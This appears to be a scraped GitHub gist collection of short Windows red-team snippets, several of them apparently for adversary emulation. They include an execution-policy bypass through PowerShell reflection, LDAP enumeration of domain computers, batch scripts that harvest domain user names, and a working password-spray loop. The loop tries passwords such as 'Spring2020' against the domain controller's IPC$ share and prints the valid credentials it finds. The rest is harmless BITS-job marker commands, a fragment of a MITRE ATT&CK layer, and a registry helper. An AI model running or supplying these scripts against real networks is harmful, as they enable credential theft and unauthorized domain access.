This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell -ep bypass -command "$s=gwmi Win32_ComputerSystem; if (-not $s.PartOfDomain) { $n=-1 } else { $dr='LDAP://';$s.Domain.Split('.') | % { $dr+='DC='+$_+',' }; $dr=$dr.TrimEnd(','); try { $ad=New-Object DirectoryServices.DirectorySearcher(([adsi]$dr),'(objectCategory=computer)',('name')); $n=($ad.FindAll()).Count } catch { $n=-2} };write-host " Hosts count: " $n; " |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# from https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ | |
function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))} | |
Disable-ExecutionPolicy |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
echo "Bits Job Executed" > %HOMEPATH%\Desktop\bitsjob.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Add-Content $env:USERPROFILE\desktop\bitsjob.txt "Bits job executed" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"name": "AzureCloudBrainStorming", | |
"version": "3.0", | |
"domain": "mitre-enterprise", | |
"description": "", | |
"filters": { | |
"stages": [ | |
"act" | |
], | |
"platforms": [ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function setKey($registryPath, $Name, $Value, $Type="DWORD") { | |
IF(!(Test-Path $registryPath)) | |
{ | |
New-Item -Path $registryPath -Force | Out-Null | |
New-ItemProperty -Path $registryPath -Name $Name -Value $value -PropertyType $Type -Force | Out-Null | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
rem Create the users.txt by parsing the "net users /domain" output | |
del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1 | |
@FOR /F "skip=6 delims=" %a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%a & @call echo %^line: =,% >> %temp%\1.txt | |
@FOR /F "delims=" %a in (%temp%\1.txt) do @set line=%a & @call echo %^line:, =,% >> %temp%\2.txt | |
@FOR /F "tokens=1-3 delims=," %n in (%temp%\2.txt) do @echo %n >> %temp%\3.txt & @echo %o >> %temp%\3.txt & @echo %p >> %temp%\3.txt | |
@FOR /F "tokens=*" %a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %a >> %temp%\users.txt | |
rem Reset the command window title so you can see the progress of the password spray in the title | |
title Command Prompt | |
rem Set your password for the spray here | |
set password=Spring2020 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1 | |
@FOR /F "skip=6 delims=" %a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%a & @call echo %^line: =,% >> %temp%\1.txt | |
@FOR /F "delims=" %a in (%temp%\1.txt) do @set line=%a & @call echo %^line:, =,% >> %temp%\2.txt | |
@FOR /F "tokens=1-3 delims=," %n in (%temp%\2.txt) do @echo %n >> %temp%\3.txt & @echo %o >> %temp%\3.txt & @echo %p >> %temp%\3.txt | |
@FOR /F "tokens=*" %a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %a >> %temp%\users.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
SETLOCAL EnableDelayedExpansion | |
del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1 | |
@FOR /F "skip=6 delims=" %%a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%%a & @call echo %%line: =,%% >> %temp%\1.txt | |
@FOR /F "delims=" %%a in (%temp%\1.txt) do @set line=%%a & @call echo %%line:, =,%% >> %temp%\2.txt | |
@FOR /F "tokens=1-3 delims=," %%n in (%temp%\2.txt) do @echo %%n >> %temp%\3.txt & @echo %%o >> %temp%\3.txt & @echo %%p >> %temp%\3.txt | |
@FOR /F "tokens=*" %%a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %%a >> %temp%\users.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@FOR /F "delims=" %p in (pass.txt) DO @FOR /F "delims=" %n in (users.txt) DO @net use %logonserver%\IPC$ /user:"%userdomain%\%n" "%p" 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete %logonserver%\IPC$ > NUL |